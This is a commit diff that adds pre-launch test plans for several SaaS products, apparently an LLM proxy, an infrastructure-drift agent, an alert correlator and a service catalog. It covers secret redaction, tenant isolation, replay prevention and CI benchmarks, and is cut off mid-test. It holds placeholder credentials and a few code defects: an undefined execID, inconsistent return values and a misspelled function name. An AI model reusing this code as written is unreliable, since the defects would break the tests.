Implement BMad Must-Have Before Launch fixes for all 6 products
P1: API key redaction, SSE billing leak, token math edge cases, CI runner config
P2: mTLS revocation lockout, terraform state lock recovery, RLS pool leak, entropy scrubber, pgmq visibility
P3: HMAC replay prevention, cross-tenant negative tests, correlation window edge cases, SQS claim-check, free tier
P4: Discovery partial failure recovery, ownership conflict integration test, VCR freshness CI, Meilisearch rebuild, Cmd+K latency
P5: Concurrent baseline conflicts, remediation RBAC, Clock interface for governance, 10K property-based runs, Redis panic fallback
P6: Cryptographic agent update signatures, streaming audit logs with WAL, shell AST parsing (mvdan/sh), intervention deadlock TTL, canary suite CI gate
This commit is contained in:
@@ -2551,3 +2551,167 @@ async fn panic_mode_allowed_for_owner_role() {
|
||||
```
|
||||
|
||||
*End of P1 Review Remediation Addendum*
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 API Key Redaction in Panic Traces
|
||||
|
||||
```rust
|
||||
// tests/security/key_redaction_test.rs
|
||||
|
||||
#[test]
|
||||
fn panic_handler_redacts_bearer_tokens_from_stack_trace() {
|
||||
// Simulate a panic inside the proxy handler while processing a request
|
||||
// with Authorization: Bearer sk-live-abc123
|
||||
let result = std::panic::catch_unwind(|| {
|
||||
process_request_with_panic("Bearer sk-live-abc123");
|
||||
});
|
||||
assert!(result.is_err());
|
||||
|
||||
// Capture the panic message
|
||||
let panic_msg = get_last_panic_message();
|
||||
assert!(!panic_msg.contains("sk-live-abc123"),
|
||||
"Panic trace contains raw API key!");
|
||||
assert!(panic_msg.contains("[REDACTED]") || !panic_msg.contains("sk-"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn error_log_redacts_provider_api_keys() {
|
||||
// Simulate an upstream error that includes the provider key in the response
|
||||
let error_body = r#"{"error": "Invalid API key: sk-proj-abc123xyz"}"#;
|
||||
let sanitized = redact_sensitive_fields(error_body);
|
||||
assert!(!sanitized.contains("sk-proj-abc123xyz"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn telemetry_event_never_contains_raw_api_key() {
|
||||
let event = create_telemetry_event("Bearer sk-live-secret", "gpt-4o", 100, 50);
|
||||
let serialized = serde_json::to_string(&event).unwrap();
|
||||
assert!(!serialized.contains("sk-live-secret"));
|
||||
assert!(!serialized.contains("Bearer"));
|
||||
}
|
||||
```
|
||||
|
||||
### 12.2 SSE Billing Leak Prevention (Expanded)
|
||||
|
||||
```rust
|
||||
#[tokio::test]
|
||||
async fn sse_disconnect_bills_only_streamed_tokens() {
|
||||
let stack = E2EStack::start().await;
|
||||
let mock = stack.mock_provider();
|
||||
|
||||
// Provider will stream 100 tokens at 1/sec
|
||||
mock.configure_slow_stream(100, Duration::from_millis(100));
|
||||
|
||||
// Client reads 10 tokens then disconnects
|
||||
let mut stream = stack.proxy_stream(&chat_request_streaming()).await;
|
||||
let mut received = 0;
|
||||
while let Some(chunk) = stream.next().await {
|
||||
received += count_tokens_in_chunk(&chunk);
|
||||
if received >= 10 { break; }
|
||||
}
|
||||
drop(stream);
|
||||
|
||||
tokio::time::sleep(Duration::from_millis(500)).await;
|
||||
|
||||
// Billing must reflect only streamed tokens
|
||||
let usage = stack.get_last_usage_record().await;
|
||||
assert!(usage.completion_tokens <= 15, // small buffer for in-flight
|
||||
"Billed {} tokens but only streamed ~10", usage.completion_tokens);
|
||||
|
||||
// Provider connection must be aborted
|
||||
assert_eq!(mock.active_connections(), 0);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn sse_disconnect_during_prompt_processing_bills_zero_completion() {
|
||||
// Client disconnects before any completion tokens are generated
|
||||
// (provider is still processing the prompt)
|
||||
let stack = E2EStack::start().await;
|
||||
let mock = stack.mock_provider();
|
||||
mock.configure_delay_before_first_token(Duration::from_secs(5));
|
||||
|
||||
let stream = stack.proxy_stream(&chat_request_streaming()).await;
|
||||
tokio::time::sleep(Duration::from_millis(100)).await;
|
||||
drop(stream); // Disconnect before first token
|
||||
|
||||
let usage = stack.get_last_usage_record().await;
|
||||
assert_eq!(usage.completion_tokens, 0);
|
||||
// Prompt tokens may still be billed (provider processed them)
|
||||
}
|
||||
```
|
||||
|
||||
### 12.3 Token Calculation Edge Cases
|
||||
|
||||
```rust
|
||||
#[test]
|
||||
fn tokenizer_handles_unicode_emoji_correctly() {
|
||||
// cl100k_base tokenizes emoji differently than ASCII
|
||||
let text = "Hello 🌍🔥 world";
|
||||
let tokens = count_tokens_cl100k(text);
|
||||
assert!(tokens > 3); // Emoji take multiple tokens
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn tokenizer_handles_cjk_characters() {
|
||||
let text = "你好世界";
|
||||
let tokens = count_tokens_cl100k(text);
|
||||
assert!(tokens >= 4); // Each CJK char is typically 1+ tokens
|
||||
}
|
||||
|
||||
#[test]
fn cost_calculation_matches_provider_billing() {
    // Property test: our token count * rate must match what the provider reports
    // within a 1% tolerance (tokenizer version differences)
    fc::assert(fc::property(
        fc::string_of(fc::any::<char>(), 1..1000),
        |text| {
            let our_count = count_tokens_cl100k(&text);
            let provider_count = mock_provider_token_count(&text);
            // Guard: a zero provider count would make the relative-error
            // division below produce inf/NaN and fail the property spuriously.
            // In that degenerate case the only acceptable count is also zero.
            if provider_count == 0 {
                return our_count == 0;
            }
            let diff = (our_count as f64 - provider_count as f64).abs();
            diff / provider_count as f64 <= 0.01
        }
    ));
}
|
||||
|
||||
#[test]
|
||||
fn anthropic_tokenizer_differs_from_openai() {
|
||||
// Same text, different token counts — billing must use the correct tokenizer
|
||||
let text = "The quick brown fox jumps over the lazy dog";
|
||||
let openai_tokens = count_tokens_cl100k(text);
|
||||
let anthropic_tokens = count_tokens_claude(text);
|
||||
// They WILL differ — verify we use the right one per provider
|
||||
assert_ne!(openai_tokens, anthropic_tokens);
|
||||
}
|
||||
```
|
||||
|
||||
### 12.4 Dedicated CI Runner for Latency Benchmarks
|
||||
|
||||
```yaml
|
||||
# .github/workflows/benchmark.yml
|
||||
# Runs on self-hosted runner (Brian's NAS) — not shared GitHub Actions
|
||||
name: Latency Benchmark
|
||||
on:
|
||||
push:
|
||||
branches: [main]
|
||||
paths: ['src/proxy/**']
|
||||
|
||||
jobs:
|
||||
benchmark:
|
||||
runs-on: self-hosted # Brian's NAS with consistent CPU
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- name: Run proxy latency benchmark
|
||||
run: cargo bench --bench proxy_latency
|
||||
- name: Assert P99 < 5ms
  run: |
    # NOTE: estimates.json's `.median.point_estimate` is the median, NOT the P99.
    # Derive the 99th percentile from criterion's raw per-iteration samples instead.
    P99=$(jq '[.times as $t | .iters as $n | range($t|length) | $t[.]/$n[.]] | sort | .[(length*99/100|floor)]' target/criterion/proxy_overhead/new/sample.json)
    if (( $(echo "$P99 > 5000000" | bc -l) )); then
      echo "P99 latency ${P99}ns exceeds 5ms budget"
      exit 1
    fi
|
||||
```
|
||||
|
||||
*End of P1 BMad Implementation*
|
||||
|
||||
@@ -2094,3 +2094,208 @@ Per review recommendation, cap E2E at 10 critical paths. Remaining 40 tests push
|
||||
| E2E/Smoke | 10% (~50) | 7% (~35) | Capped at 10 true E2E + 25 Playwright UI tests |
|
||||
|
||||
*End of P2 Review Remediation Addendum*
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 mTLS Revocation — Instant Lockout
|
||||
|
||||
```go
|
||||
// tests/integration/mtls_revocation_test.go
|
||||
|
||||
func TestRevokedCert_ExistingConnectionDropped(t *testing.T) {
|
||||
// 1. Agent connects with valid cert
|
||||
agent := connectAgentWithCert(t, validCert)
|
||||
assert.True(t, agent.IsConnected())
|
||||
|
||||
// 2. Revoke the cert via CRL update
|
||||
revokeCert(t, validCert.SerialNumber)
|
||||
|
||||
// 3. Force CRL refresh on SaaS (< 30 seconds)
|
||||
triggerCRLRefresh(t)
|
||||
|
||||
// 4. Existing connection must be terminated
|
||||
time.Sleep(5 * time.Second)
|
||||
assert.False(t, agent.IsConnected(),
|
||||
"Revoked agent still has active mTLS connection — cached session not cleared")
|
||||
}
|
||||
|
||||
func TestRevokedCert_NewConnectionRejected(t *testing.T) {
|
||||
revokeCert(t, validCert.SerialNumber)
|
||||
triggerCRLRefresh(t)
|
||||
|
||||
_, err := connectAgentWithCert(t, validCert)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "certificate revoked")
|
||||
}
|
||||
|
||||
func TestPayloadReplay_RejectedByNonce(t *testing.T) {
|
||||
// Capture a legitimate drift report
|
||||
report := captureValidDriftReport(t)
|
||||
|
||||
// Replay it
|
||||
resp := postDriftReport(t, report)
|
||||
assert.Equal(t, 409, resp.StatusCode) // Conflict — nonce already used
|
||||
}
|
||||
```
|
||||
|
||||
### 12.2 Terraform State Lock Recovery on Panic
|
||||
|
||||
```go
|
||||
// tests/integration/remediation_panic_test.go
|
||||
|
||||
func TestPanicMode_ReleasesTerraformStateLock(t *testing.T) {
|
||||
// 1. Start a remediation (terraform apply)
|
||||
execID := startRemediation(t, "stack-1", "drift-1")
|
||||
waitForState(t, execID, "applying")
|
||||
|
||||
// 2. Verify state lock is held
|
||||
lockInfo := getTerraformStateLock(t, "stack-1")
|
||||
assert.NotNil(t, lockInfo, "State lock should be held during apply")
|
||||
|
||||
// 3. Trigger panic mode
|
||||
triggerPanicMode(t)
|
||||
|
||||
// 4. Wait for agent to abort
|
||||
waitForState(t, execID, "aborted")
|
||||
|
||||
// 5. State lock MUST be released
|
||||
lockInfo = getTerraformStateLock(t, "stack-1")
|
||||
assert.Nil(t, lockInfo,
|
||||
"Terraform state lock not released after panic — infrastructure is now in zombie state")
|
||||
}
|
||||
|
||||
func TestPanicMode_AgentRunsTerraformForceUnlock(t *testing.T) {
|
||||
// If normal unlock fails, agent must run `terraform force-unlock`
|
||||
startRemediation(t, "stack-1", "drift-1")
|
||||
waitForState(t, execID, "applying")
|
||||
|
||||
// Simulate lock that can't be released normally
|
||||
corruptStateLock(t, "stack-1")
|
||||
triggerPanicMode(t)
|
||||
|
||||
// Agent should attempt force-unlock
|
||||
logs := getAgentLogs(t)
|
||||
assert.Contains(t, logs, "terraform force-unlock")
|
||||
}
|
||||
```
|
||||
|
||||
### 12.3 RLS Connection Pool Leak Test
|
||||
|
||||
```go
|
||||
// tests/integration/rls_pool_leak_test.go
|
||||
|
||||
func TestPgBouncer_ClearsTenantContext_BetweenRequests(t *testing.T) {
|
||||
t.Parallel()
|
||||
|
||||
// 1. Request as Tenant A — sets SET LOCAL app.tenant_id = 'tenant-a'
|
||||
respA := apiRequest(t, tenantAToken, "GET", "/v1/stacks")
|
||||
assert.Equal(t, 200, respA.StatusCode)
|
||||
stacksA := parseStacks(respA)
|
||||
|
||||
// 2. Immediately request as Tenant B on same PgBouncer connection
|
||||
respB := apiRequest(t, tenantBToken, "GET", "/v1/stacks")
|
||||
assert.Equal(t, 200, respB.StatusCode)
|
||||
stacksB := parseStacks(respB)
|
||||
|
||||
// 3. Tenant B must NOT see Tenant A's stacks
|
||||
for _, stack := range stacksB {
|
||||
assert.NotEqual(t, "tenant-a", stack.TenantID,
|
||||
"CRITICAL: Tenant B received Tenant A's data — PgBouncer leaked context")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRLS_100ConcurrentTenants_NoLeakage(t *testing.T) {
|
||||
// Stress test: 100 concurrent requests from different tenants
|
||||
var wg sync.WaitGroup
|
||||
violations := make(chan string, 100)
|
||||
|
||||
for i := 0; i < 100; i++ {
|
||||
wg.Add(1)
|
||||
go func(tenantID string) {
|
||||
defer wg.Done()
|
||||
token := createTenantToken(t, tenantID)
|
||||
resp := apiRequest(t, token, "GET", "/v1/stacks")
|
||||
stacks := parseStacks(resp)
|
||||
for _, s := range stacks {
|
||||
if s.TenantID != tenantID {
|
||||
violations <- fmt.Sprintf("Tenant %s saw data from %s", tenantID, s.TenantID)
|
||||
}
|
||||
}
|
||||
}(fmt.Sprintf("tenant-%d", i))
|
||||
}
|
||||
wg.Wait()
|
||||
close(violations)
|
||||
|
||||
for v := range violations {
|
||||
t.Fatal("CROSS-TENANT LEAK:", v)
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 12.4 Secret Scrubber Entropy Scanning
|
||||
|
||||
```go
|
||||
// pkg/agent/scrubber/entropy_test.go
|
||||
|
||||
func TestEntropyScan_DetectsBase64EncodedAWSKey(t *testing.T) {
|
||||
// AWS key base64-encoded inside a JSON block
|
||||
input := `{"config": "` + base64.StdEncoding.EncodeToString([]byte("AKIAIOSFODNN7EXAMPLE")) + `"}`
|
||||
result := scrubber.Scrub(input)
|
||||
assert.NotContains(t, result, "AKIAIOSFODNN7EXAMPLE")
|
||||
}
|
||||
|
||||
func TestEntropyScan_DetectsMultiLineRSAKey(t *testing.T) {
|
||||
input := `-----BEGIN RSA PRIVATE KEY-----
|
||||
MIIEpAIBAAKCAQEA0Z3VS5JJcds3xfn/ygWyF8PbnGy5AhJPnUfGqlTlGa...
|
||||
-----END RSA PRIVATE KEY-----`
|
||||
result := scrubber.Scrub(input)
|
||||
assert.Contains(t, result, "[REDACTED RSA KEY]")
|
||||
}
|
||||
|
||||
func TestEntropyScan_DetectsHighEntropyCustomToken(t *testing.T) {
|
||||
// 40-char hex string that looks like a custom API token
|
||||
token := "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0"
|
||||
input := fmt.Sprintf(`{"api_token": "%s"}`, token)
|
||||
result := scrubber.Scrub(input)
|
||||
// Shannon entropy > 3.5 bits/char should trigger redaction
|
||||
assert.NotContains(t, result, token)
|
||||
}
|
||||
|
||||
func TestEntropyScan_DoesNotRedactNormalText(t *testing.T) {
|
||||
input := `{"message": "Hello world, this is a normal log message"}`
|
||||
result := scrubber.Scrub(input)
|
||||
assert.Equal(t, input, result) // No false positives
|
||||
}
|
||||
```
|
||||
|
||||
### 12.5 pgmq Visibility Timeout for Long Scans
|
||||
|
||||
```go
|
||||
// tests/integration/pgmq_visibility_test.go
|
||||
|
||||
func TestPgmq_LongScan_DoesNotTriggerDuplicateProcessing(t *testing.T) {
|
||||
// Simulate a scan that takes 5 minutes
|
||||
queue := setupPgmqQueue(t)
|
||||
|
||||
// Enqueue a drift report
|
||||
queue.Send(t, makeDriftReport("stack-1"))
|
||||
|
||||
// Consumer 1 picks it up with 2-minute visibility timeout
|
||||
msg := queue.Read(t, 120) // 120s visibility
|
||||
assert.NotNil(t, msg)
|
||||
|
||||
// Simulate long processing (extend visibility)
|
||||
for i := 0; i < 3; i++ {
|
||||
time.Sleep(90 * time.Second)
|
||||
queue.ExtendVisibility(t, msg.ID, 120) // Extend by another 2 min
|
||||
}
|
||||
|
||||
// Consumer 2 should NOT get the same message
|
||||
msg2 := queue.Read(t, 120)
|
||||
assert.Nil(t, msg2, "pgmq handed job to second worker while first was still processing")
|
||||
}
|
||||
```
|
||||
|
||||
*End of P2 BMad Implementation*
|
||||
|
||||
@@ -1865,3 +1865,227 @@ describe('Slack Notification Circuit Breaker', () => {
|
||||
| E2E | 10% (~20) | 10% (~28) | Dashboard UI (Playwright), onboarding flow |
|
||||
|
||||
*End of P3 Review Remediation Addendum*
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 HMAC Timestamp Freshness (Replay Attack Prevention)
|
||||
|
||||
```typescript
|
||||
describe('HMAC Replay Attack Prevention', () => {
|
||||
it('rejects Datadog webhook with timestamp older than 5 minutes', async () => {
|
||||
const payload = makeDatadogPayload();
|
||||
const staleTimestamp = Math.floor(Date.now() / 1000) - 301; // 5min + 1s
|
||||
const sig = computeDatadogHMAC(payload, staleTimestamp);
|
||||
|
||||
const resp = await ingest(payload, {
|
||||
'dd-webhook-timestamp': staleTimestamp.toString(),
|
||||
'dd-webhook-signature': sig,
|
||||
});
|
||||
expect(resp.status).toBe(401);
|
||||
expect(resp.body.error).toContain('stale timestamp');
|
||||
});
|
||||
|
||||
it('rejects PagerDuty webhook with missing timestamp', async () => {
|
||||
const payload = makePagerDutyPayload();
|
||||
const sig = computePagerDutyHMAC(payload);
|
||||
|
||||
const resp = await ingest(payload, {
|
||||
'x-pagerduty-signature': sig,
|
||||
// No timestamp header
|
||||
});
|
||||
expect(resp.status).toBe(401);
|
||||
});
|
||||
|
||||
it('rejects OpsGenie webhook replayed after 5 minutes', async () => {
|
||||
// OpsGenie doesn't always package timestamp cleanly
|
||||
// Must extract from payload body and validate
|
||||
const payload = makeOpsGeniePayload({ timestamp: fiveMinutesAgo() });
|
||||
const sig = computeOpsGenieHMAC(payload);
|
||||
|
||||
const resp = await ingest(payload, { 'x-opsgenie-signature': sig });
|
||||
expect(resp.status).toBe(401);
|
||||
});
|
||||
|
||||
it('accepts fresh webhook within 5-minute window', async () => {
|
||||
const payload = makeDatadogPayload();
|
||||
const freshTimestamp = Math.floor(Date.now() / 1000);
|
||||
const sig = computeDatadogHMAC(payload, freshTimestamp);
|
||||
|
||||
const resp = await ingest(payload, {
|
||||
'dd-webhook-timestamp': freshTimestamp.toString(),
|
||||
'dd-webhook-signature': sig,
|
||||
});
|
||||
expect(resp.status).toBe(200);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.2 Cross-Tenant Negative Isolation Tests
|
||||
|
||||
```typescript
|
||||
describe('DynamoDB Tenant Isolation (Negative Tests)', () => {
|
||||
it('Tenant A cannot read Tenant B incidents', async () => {
|
||||
// Seed data for both tenants
|
||||
await createIncident('tenant-a', { title: 'A incident' });
|
||||
await createIncident('tenant-b', { title: 'B incident' });
|
||||
|
||||
// Query as Tenant A
|
||||
const results = await dao.listIncidents('tenant-a');
|
||||
|
||||
// Explicitly assert Tenant B data is absent
|
||||
const tenantIds = results.map(r => r.tenantId);
|
||||
expect(tenantIds).not.toContain('tenant-b');
|
||||
expect(results.every(r => r.tenantId === 'tenant-a')).toBe(true);
|
||||
});
|
||||
|
||||
it('Tenant A cannot read Tenant B analytics', async () => {
|
||||
await seedAnalytics('tenant-a', { alertCount: 100 });
|
||||
await seedAnalytics('tenant-b', { alertCount: 200 });
|
||||
|
||||
const analytics = await dao.getAnalytics('tenant-a');
|
||||
expect(analytics.alertCount).toBe(100); // Not 300 (combined)
|
||||
});
|
||||
|
||||
it('API returns 404 (not 403) for cross-tenant incident access', async () => {
|
||||
const incident = await createIncident('tenant-b', { title: 'secret' });
|
||||
|
||||
const resp = await api.get(`/v1/incidents/${incident.id}`)
|
||||
.set('Authorization', `Bearer ${tenantAToken}`);
|
||||
|
||||
// 404 not 403 — don't leak existence
|
||||
expect(resp.status).toBe(404);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.3 Correlation Window Edge Cases
|
||||
|
||||
```typescript
|
||||
describe('Out-of-Order Alert Delivery', () => {
|
||||
it('late alert attaches to existing incident (not duplicate)', async () => {
|
||||
const clock = new FakeClock();
|
||||
const engine = new CorrelationEngine(new InMemoryWindowStore(), clock);
|
||||
|
||||
// Alert 1 arrives at T=0
|
||||
const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 0 });
|
||||
const incident1 = await engine.process(alert1);
|
||||
|
||||
// Window closes at T=5min, incident shipped
|
||||
clock.advanceBy(5 * 60 * 1000);
|
||||
await engine.flushWindows();
|
||||
|
||||
// Late alert arrives at T=6min with timestamp T=2min (within original window)
|
||||
const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 2 * 60 * 1000 });
|
||||
const result = await engine.process(lateAlert);
|
||||
|
||||
// Must attach to existing incident, not create new one
|
||||
expect(result.incidentId).toBe(incident1.incidentId);
|
||||
expect(result.action).toBe('attached_to_existing');
|
||||
});
|
||||
|
||||
it('very late alert (>2x window) creates new incident', async () => {
|
||||
const clock = new FakeClock();
|
||||
const engine = new CorrelationEngine(new InMemoryWindowStore(), clock);
|
||||
|
||||
const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high' });
|
||||
const incident1 = await engine.process(alert1);
|
||||
|
||||
// 15 minutes later (3x the 5-min window)
|
||||
clock.advanceBy(15 * 60 * 1000);
|
||||
|
||||
const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high' });
|
||||
const result = await engine.process(lateAlert);
|
||||
|
||||
expect(result.incidentId).not.toBe(incident1.incidentId);
|
||||
expect(result.action).toBe('new_incident');
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.4 SQS Claim-Check Round-Trip
|
||||
|
||||
```typescript
|
||||
describe('SQS 256KB Claim-Check End-to-End', () => {
|
||||
it('large payload round-trips through S3 pointer', async () => {
|
||||
const largePayload = makeLargeAlertPayload(300 * 1024); // 300KB
|
||||
|
||||
// Ingestion compresses and stores in S3
|
||||
const resp = await ingest(largePayload);
|
||||
expect(resp.status).toBe(200);
|
||||
|
||||
// SQS message contains S3 pointer
|
||||
const sqsMsg = await getLastSQSMessage(localstack, 'alert-queue');
|
||||
const body = JSON.parse(sqsMsg.Body);
|
||||
expect(body.s3Pointer).toBeDefined();
|
||||
|
||||
// Correlation engine fetches from S3 and processes
|
||||
const incident = await waitForIncidentCreated(5000);
|
||||
expect(incident).toBeDefined();
|
||||
expect(incident.sourceAlertCount).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it('S3 fetch timeout does not crash correlation engine', async () => {
|
||||
// Inject S3 latency (10 second delay)
|
||||
mockS3.setLatency(10000);
|
||||
|
||||
const largePayload = makeLargeAlertPayload(300 * 1024);
|
||||
await ingest(largePayload);
|
||||
|
||||
// Correlation engine should timeout and send to DLQ
|
||||
const dlqMsg = await getDLQMessage(localstack, 'alert-dlq', 15000);
|
||||
expect(dlqMsg).toBeDefined();
|
||||
|
||||
// Engine is still healthy
|
||||
const health = await api.get('/health');
|
||||
expect(health.status).toBe(200);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.5 Free Tier Enforcement
|
||||
|
||||
```typescript
|
||||
describe('Free Tier (10K alerts/month, 7-day retention)', () => {
|
||||
it('accepts alert at 9,999 count', async () => {
|
||||
await setAlertCounter('tenant-free', 9999);
|
||||
const resp = await ingestAsTenat('tenant-free', makeAlert());
|
||||
expect(resp.status).toBe(200);
|
||||
});
|
||||
|
||||
it('rejects alert at 10,001 with upgrade prompt', async () => {
|
||||
await setAlertCounter('tenant-free', 10000);
|
||||
const resp = await ingestAsTenant('tenant-free', makeAlert());
|
||||
expect(resp.status).toBe(429);
|
||||
expect(resp.body.upgrade_url).toContain('stripe');
|
||||
});
|
||||
|
||||
it('counter resets on first of month', async () => {
|
||||
await setAlertCounter('tenant-free', 10000);
|
||||
clock.advanceToFirstOfNextMonth();
|
||||
await runMonthlyReset();
|
||||
|
||||
const resp = await ingestAsTenant('tenant-free', makeAlert());
|
||||
expect(resp.status).toBe(200);
|
||||
});
|
||||
|
||||
it('purges data older than 7 days on free tier', async () => {
|
||||
await createIncident('tenant-free', { createdAt: eightDaysAgo() });
|
||||
await runRetentionPurge();
|
||||
|
||||
const incidents = await dao.listIncidents('tenant-free');
|
||||
expect(incidents).toHaveLength(0);
|
||||
});
|
||||
|
||||
it('retains data for 90 days on pro tier', async () => {
|
||||
await createIncident('tenant-pro', { createdAt: thirtyDaysAgo() });
|
||||
await runRetentionPurge();
|
||||
|
||||
const incidents = await dao.listIncidents('tenant-pro');
|
||||
expect(incidents).toHaveLength(1);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
*End of P3 BMad Implementation*
|
||||
|
||||
@@ -1265,3 +1265,225 @@ def test_meilisearch_index_rebuild_does_not_drop_search():
|
||||
# Verify zero-downtime index swapping during mapping updates
|
||||
pass
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 Discovery Scan Timeout / Partial Failure Recovery
|
||||
|
||||
```python
|
||||
# tests/integration/test_discovery_resilience.py
|
||||
|
||||
def test_partial_aws_scan_does_not_delete_existing_services():
|
||||
"""If AWS scanner times out after discovering 500 of 1000 resources,
|
||||
existing catalog entries must NOT be marked stale or deleted."""
|
||||
|
||||
# Seed catalog with 1000 services
|
||||
seed_catalog(count=1000)
|
||||
|
||||
# Simulate scanner timeout after 500 resources
|
||||
with mock_aws_timeout_after(500):
|
||||
result = run_aws_discovery_scan()
|
||||
|
||||
assert result.status == "partial_failure"
|
||||
assert result.discovered == 500
|
||||
|
||||
# All 1000 services must still exist in catalog
|
||||
services = catalog_api.list_services()
|
||||
assert len(services) == 1000 # NOT 500
|
||||
|
||||
# Partial results should be staged, not committed
|
||||
staged = catalog_api.list_staged_updates()
|
||||
assert len(staged) == 500
|
||||
|
||||
def test_partial_github_scan_does_not_corrupt_ownership():
|
||||
"""If GitHub scanner hits rate limit mid-scan, existing ownership
|
||||
mappings must be preserved."""
|
||||
|
||||
seed_catalog_with_ownership(count=100)
|
||||
|
||||
with mock_github_rate_limit_after(50):
|
||||
result = run_github_discovery_scan()
|
||||
|
||||
assert result.status == "partial_failure"
|
||||
|
||||
# All 100 ownership mappings intact
|
||||
services = catalog_api.list_services()
|
||||
owned = [s for s in services if s.owner is not None]
|
||||
assert len(owned) == 100 # NOT 50
|
||||
|
||||
def test_scan_failure_triggers_alert_not_silent_failure():
|
||||
result = run_aws_discovery_scan_with_invalid_credentials()
|
||||
assert result.status == "failed"
|
||||
|
||||
# Must alert the admin
|
||||
alerts = get_admin_alerts()
|
||||
assert any("discovery scan failed" in a.message for a in alerts)
|
||||
```
|
||||
|
||||
### 12.2 Ownership Conflict Resolution Integration Test
|
||||
|
||||
```python
|
||||
# tests/integration/test_ownership_conflict.py
|
||||
|
||||
def test_explicit_config_overrides_implicit_tag():
|
||||
"""Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits)"""
|
||||
|
||||
# AWS tag says owner is "team-infra"
|
||||
aws_scanner.discover_service("auth-api", owner_tag="team-infra")
|
||||
|
||||
# GitHub CODEOWNERS says owner is "team-platform"
|
||||
github_scanner.discover_service("auth-api", codeowners="team-platform")
|
||||
|
||||
# Resolve conflict
|
||||
service = catalog_api.get_service("auth-api")
|
||||
assert service.owner == "team-platform" # Explicit wins
|
||||
assert service.owner_source == "codeowners"
|
||||
|
||||
def test_concurrent_discovery_sources_do_not_race():
|
||||
"""Two scanners discovering the same service simultaneously
|
||||
must not create duplicate entries."""
|
||||
|
||||
import asyncio
|
||||
|
||||
async def run_both():
|
||||
await asyncio.gather(
|
||||
aws_scanner.discover_service_async("billing-api"),
|
||||
github_scanner.discover_service_async("billing-api"),
|
||||
)
|
||||
|
||||
asyncio.run(run_both())
|
||||
|
||||
services = catalog_api.search("billing-api")
|
||||
assert len(services) == 1 # No duplicates
|
||||
|
||||
def test_heuristic_ownership_does_not_override_explicit():
|
||||
# Explicit owner set via config
|
||||
catalog_api.set_owner("auth-api", "team-platform", source="config")
|
||||
|
||||
# Heuristic scanner infers different owner from commit history
|
||||
github_scanner.infer_ownership("auth-api", top_committer="dev@other-team.com")
|
||||
|
||||
service = catalog_api.get_service("auth-api")
|
||||
assert service.owner == "team-platform" # Explicit preserved
|
||||
```
|
||||
|
||||
### 12.3 VCR Cassette Freshness Validation
|
||||
|
||||
```yaml
|
||||
# .github/workflows/vcr-refresh.yml
|
||||
# Weekly job to re-record VCR cassettes against real AWS
|
||||
name: VCR Cassette Freshness
|
||||
on:
|
||||
schedule:
|
||||
- cron: '0 6 * * 1' # Every Monday 6 AM UTC
|
||||
|
||||
jobs:
|
||||
refresh:
|
||||
runs-on: self-hosted
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- name: Re-record cassettes
|
||||
env:
|
||||
AWS_ACCESS_KEY_ID: ${{ secrets.VCR_AWS_KEY }}
|
||||
AWS_SECRET_ACCESS_KEY: ${{ secrets.VCR_AWS_SECRET }}
|
||||
run: |
|
||||
VCR_RECORD=all pytest tests/integration/scanners/ -v
|
||||
- name: Diff cassettes
|
||||
run: |
|
||||
git diff --stat tests/cassettes/
|
||||
CHANGED=$(git diff --name-only tests/cassettes/ | wc -l)
|
||||
if [ "$CHANGED" -gt 0 ]; then
|
||||
echo "⚠️ $CHANGED cassettes changed — AWS API responses have drifted"
|
||||
echo "Review and commit updated cassettes"
|
||||
fi
|
||||
- name: Create PR if cassettes changed
|
||||
uses: peter-evans/create-pull-request@v6
|
||||
with:
|
||||
title: "chore: refresh VCR cassettes (AWS API drift)"
|
||||
branch: vcr-refresh
|
||||
```
|
||||
|
||||
### 12.4 Meilisearch Zero-Downtime Index Rebuild
|
||||
|
||||
```python
|
||||
# tests/integration/test_meilisearch_rebuild.py
|
||||
|
||||
def test_search_returns_results_during_index_rebuild():
|
||||
"""Cmd+K search must work during index rebuild (zero downtime)."""
|
||||
|
||||
# Seed index with 100 services
|
||||
meili.index("services").add_documents(make_services(100))
|
||||
meili.index("services").wait_for_pending_update()
|
||||
|
||||
# Start rebuild (creates services_v2, swaps when ready)
|
||||
rebuild_task = start_index_rebuild()
|
||||
|
||||
# Search must still work during rebuild
|
||||
results = meili.index("services").search("auth")
|
||||
assert len(results["hits"]) > 0
|
||||
|
||||
# Wait for rebuild to complete
|
||||
rebuild_task.wait()
|
||||
|
||||
# Search still works after swap
|
||||
results = meili.index("services").search("auth")
|
||||
assert len(results["hits"]) > 0
|
||||
|
||||
def test_index_rebuild_failure_does_not_corrupt_active_index():
|
||||
meili.index("services").add_documents(make_services(50))
|
||||
|
||||
# Simulate rebuild failure (e.g., OOM during indexing)
|
||||
with mock_meili_oom_during_rebuild():
|
||||
result = start_index_rebuild()
|
||||
|
||||
assert result.status == "failed"
|
||||
|
||||
# Active index must be untouched
|
||||
